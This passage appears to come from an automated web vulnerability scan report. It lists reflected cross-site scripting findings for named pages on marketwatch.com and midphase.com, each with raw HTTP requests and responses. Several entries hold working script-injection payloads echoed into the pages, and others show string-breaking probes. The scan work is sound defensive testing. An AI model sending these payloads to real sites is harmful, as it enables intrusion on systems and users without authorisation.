Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_c=w%3A1%7Cb%3A2%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; refresh=off; rsi_csl=; rsi_segs=
Content-Length: 6314

c=%7B%22c%22%3A%22d71e124eb75a400681a0e3b95b460529%22%2C%22s%22%3A%2210.240.178.143%22%7D&m=%5B%7B%22h%22%3A%7B%22t%22%3A%22%2Fquotes%2Fcomstock%2F10w!i%3Adji%22%2C%22a%22%3A%22subscribe%22%7D%2C%22b%
...[SNIP]...

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp05
Date: Sat, 14 May 2011 10:20:10 GMT
Content-Length: 50890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/bg/api53699';3aed18dbeed/Pickup.ashx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.97. http://www.marketwatch.com/doubleclick/DARTIframe.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /doubleclick/DARTIframe.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b5fe'%3b9ea664612a2 was submitted in the REST URL parameter 1. This input was echoed as 6b5fe';9ea664612a2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /doubleclick6b5fe'%3b9ea664612a2/DARTIframe.html?adParams=queId%3D1304622833178%26thirdPartyImpUrl%3Dhttp%253A//ad.doubleclick.net/ad/N3941.marketwatch.com/B5325532.17%253Bsz%253D1x1%253Bpc%253DDFP240691320%253Bord%253D3068525%253F%26thirdPartyFlashDisplayUrl%3D%26thirdPartyBackupImpUrl%3D%26surveyUrl%3D%26googleContextDiscoveryUrl%3Dhttp%253A//pagead2.googlesyndication.com/pagead/ads%253Fclient%253Ddclk-3pas-query%2526output%253Dxml%2526geo%253Dtrue%26livePreviewSiteUrl%3D%2525LivePreviewSiteUrl%26customScriptFileUrl%3D%26servingMethod%3Di%26mode%3DFlash%26isHTML5Creative%3Dfalse%26isHTML5PreviewMode%3Dfalse%26forceHTML5Creative%3Dfalse%26macro_j%3D910903057632460979-1018090093%26macro_eenv%3Di%26macro_g%3Dct%253DUS%2526st%253DVT%2526ac%253D802%2526zp%253D05672%2526bw%253D4%2526dma%253D25%2526city%253D17565%26macro_s%3Dmarketwatch.com%26macro_eaid%3D240691320%26macro_n%3D3068525%26macro_m%3D910903057632460979%26macro_erid%3D41996359%26macro_ebuy%3D5407031%26macro_ecid%3D41978572%26macro_erv%3D1%26macro_epid%3D13112443%26macro_eadv%3D1363789%26macro_esid%3D377367%26macro_ekid%3D0%26csiBaseline%3D1305367984368%26csiAdRespTime%3DNaN%26shouldDisplayFlashAsset%3Dtrue%26globalTemplateJs%3Dhttp%253A//s0.2mdn.net/879366/expandingIframeGlobalTemplate_v2_59_09.js&gtVersion=59_09&mediaserver=http%3A//s0.2mdn.net/879366&cid=GlobalTemplate_13046228331781305367984368&index=0 HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/marketwatch.com/frontpage;u=%5e%5e;sz=250x26;tile=2;ord=1820011674?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_c=w%3A1%7Cb%3A2%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; refresh=off; rsi_csl=; rsi_segs=; BIZO=biz=1053&

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-MACHINE: sbkdfpswebp01
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:20:59 GMT
Content-Length: 52318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/doubleclick6b5fe';9ea664612a2/DARTIframe.html';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.98. http://www.marketwatch.com/doubleclick/DARTIframe.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /doubleclick/DARTIframe.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c3f9'%3b8adafa61384 was submitted in the REST URL parameter 2. This input was echoed as 1c3f9';8adafa61384 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /doubleclick/DARTIframe.html1c3f9'%3b8adafa61384?adParams=queId%3D1304622833178%26thirdPartyImpUrl%3Dhttp%253A//ad.doubleclick.net/ad/N3941.marketwatch.com/B5325532.17%253Bsz%253D1x1%253Bpc%253DDFP240691320%253Bord%253D3068525%253F%26thirdPartyFlashDisplayUrl%3D%26thirdPartyBackupImpUrl%3D%26surveyUrl%3D%26googleContextDiscoveryUrl%3Dhttp%253A//pagead2.googlesyndication.com/pagead/ads%253Fclient%253Ddclk-3pas-query%2526output%253Dxml%2526geo%253Dtrue%26livePreviewSiteUrl%3D%2525LivePreviewSiteUrl%26customScriptFileUrl%3D%26servingMethod%3Di%26mode%3DFlash%26isHTML5Creative%3Dfalse%26isHTML5PreviewMode%3Dfalse%26forceHTML5Creative%3Dfalse%26macro_j%3D910903057632460979-1018090093%26macro_eenv%3Di%26macro_g%3Dct%253DUS%2526st%253DVT%2526ac%253D802%2526zp%253D05672%2526bw%253D4%2526dma%253D25%2526city%253D17565%26macro_s%3Dmarketwatch.com%26macro_eaid%3D240691320%26macro_n%3D3068525%26macro_m%3D910903057632460979%26macro_erid%3D41996359%26macro_ebuy%3D5407031%26macro_ecid%3D41978572%26macro_erv%3D1%26macro_epid%3D13112443%26macro_eadv%3D1363789%26macro_esid%3D377367%26macro_ekid%3D0%26csiBaseline%3D1305367984368%26csiAdRespTime%3DNaN%26shouldDisplayFlashAsset%3Dtrue%26globalTemplateJs%3Dhttp%253A//s0.2mdn.net/879366/expandingIframeGlobalTemplate_v2_59_09.js&gtVersion=59_09&mediaserver=http%3A//s0.2mdn.net/879366&cid=GlobalTemplate_13046228331781305367984368&index=0 HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/marketwatch.com/frontpage;u=%5e%5e;sz=250x26;tile=2;ord=1820011674?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_c=w%3A1%7Cb%3A2%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; refresh=off; rsi_csl=; rsi_segs=; BIZO=biz=1053&

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp01
Date: Sat, 14 May 2011 10:21:23 GMT
Content-Length: 52296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/doubleclick/DARTIframe.html1c3f9';8adafa61384';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.99. http://www.marketwatch.com/news/Headline/_HeadlineItem [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /news/Headline/_HeadlineItem

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95487'%3b4ce0dc04769 was submitted in the REST URL parameter 3. This input was echoed as 95487';4ce0dc04769 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/Headline/_HeadlineItem95487'%3b4ce0dc04769 HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_c=w%3A1%7Cb%3A2%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=314598747735047_1_0.01_0_5_1305799975264

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: sbkdfpswebp03
Date: Sat, 14 May 2011 11:03:10 GMT
Content-Length: 50879

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/news/Headline/_HeadlineItem95487';4ce0dc04769';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.100. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23f1f'%3b9ca0a5d917e was submitted in the REST URL parameter 1. This input was echoed as 23f1f';9ca0a5d917e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /story23f1f'%3b9ca0a5d917e/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A3%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lA; rsi_segs=G07608_10001; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Article_Futures%252520Movers_53B5F46A-7D06-11E0-915A-00212804637C%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13%25253Flink%25253DMW_story_in%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp02
Date: Sat, 14 May 2011 10:42:46 GMT
Content-Length: 51307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/story23f1f';9ca0a5d917e/citigroups-new-look-is-plainly-cosmetic-2011-05-13';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.101. http://www.marketwatch.com/story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /story/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9921'%3b72a080b99e0 was submitted in the REST URL parameter 1. This input was echoed as c9921';72a080b99e0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /storyc9921'%3b72a080b99e0/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390?Link=obinsite HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://traffic.outbrain.com/network/redir?key=f465737d830a35fc698cafafb4ce7caf&rdid=205292719&type=IMD_def_prd&in-site=true&req_id=cd9a83f96a2d455991d95bc48290df11&agent=blog_JS_rec&recMode=3&reqType=1&wid=102&imgType=0&version=37740&idx=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A4%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lA; rsi_segs=G07608_10001; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-Powered-By: ASP.NET
X-MACHINE: secdedtwebp01
Date: Sat, 14 May 2011 10:45:23 GMT
Content-Length: 51272

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/storyc9921';72a080b99e0/medicare-social-security-finance-outlook-worsens-2011-05-13-1223390';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.102. http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd171'%3b895992777ed was submitted in the REST URL parameter 1. This input was echoed as bd171';895992777ed in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /storybd171'%3b895992777ed/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12 HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_c=w%3A1%7Cb%3A2%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_cc=true; s_vnum=1307959980006%26vn%3D1; refresh=off; rsi_csl=; rsi_segs=; BIZO=biz=1053&; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-Powered-By: ASP.NET
X-MACHINE: secdfpswebp05
Date: Sat, 14 May 2011 10:33:16 GMT
Content-Length: 51081

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/storybd171';895992777ed/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.103. http://www.midphase.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.midphase.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dbc2"><script>alert(1)</script>632c554a508 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico6dbc2"><script>alert(1)</script>632c554a508 HTTP/1.1
Host: www.midphase.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1305377515.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1634246940.1305377515.1305377515.1305377515.1; __utmc=1; __utmv=1.|1=Chat=Yes=1,; __utmb=1.2.10.1305377515; rrCookie_sessionInfo=%7B%22status%22%3A%22invalid%22%7D

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:53:33 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=859980f553abc79bfc641c0f70463d4a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16278


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-
...[SNIP]...
<input type="hidden" name="url" value="/favicon.ico6dbc2"><script>alert(1)</script>632c554a508" />
...[SNIP]...

4.104. http://www.midphase.com/includes/form-processing/captcha/cryptographp.inc.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.midphase.com
Path:   /includes/form-processing/captcha/cryptographp.inc.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81167"><script>alert(1)</script>99199d6d8d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes81167"><script>alert(1)</script>99199d6d8d4/form-processing/captcha/cryptographp.inc.php?cfg=gray.cfg.php&sn=PHPSESSID& HTTP/1.1
Host: www.midphase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.midphase.com/favicon.ico6dbc2%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E632c554a508
Cookie: cryptcookietest=1; PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4; __utma=1.1523231672.1305459815.1305459815.1305459815.1; __utmb=1.1.10.1305459815; __utmc=1; __utmz=1.1305459815.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 11:44:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-
...[SNIP]...
<input type="hidden" name="url" value="/includes81167"><script>alert(1)</script>99199d6d8d4/form-processing/captcha/cryptographp.inc.php?cfg=gray.cfg.php&sn=PHPSESSID&" />
...[SNIP]...

4.105. http://www.midphase.com/includes/form-processing/captcha/cryptographp.inc.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.midphase.com
Path:   /includes/form-processing/captcha/cryptographp.inc.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78c41"><script>alert(1)</script>4d2893d813a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/form-processing78c41"><script>alert(1)</script>4d2893d813a/captcha/cryptographp.inc.php?cfg=gray.cfg.php&sn=PHPSESSID& HTTP/1.1
Host: www.midphase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.midphase.com/favicon.ico6dbc2%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E632c554a508
Cookie: cryptcookietest=1; PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4; __utma=1.1523231672.1305459815.1305459815.1305459815.1; __utmb=1.1.10.1305459815; __utmc=1; __utmz=1.1305459815.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 11:44:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-
...[SNIP]...
<input type="hidden" name="url" value="/includes/form-processing78c41"><script>alert(1)</script>4d2893d813a/captcha/cryptographp.inc.php?cfg=gray.cfg.php&sn=PHPSESSID&" />
...[SNIP]...

4.106. http://www.midphase.com/includes/form-processing/captcha/cryptographp.inc.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.midphase.com
Path:   /includes/form-processing/captcha/cryptographp.inc.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae79b"><script>alert(1)</script>9d0b499024c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/form-processing/captchaae79b"><script>alert(1)</script>9d0b499024c/cryptographp.inc.php?cfg=gray.cfg.php&sn=PHPSESSID& HTTP/1.1
Host: www.midphase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
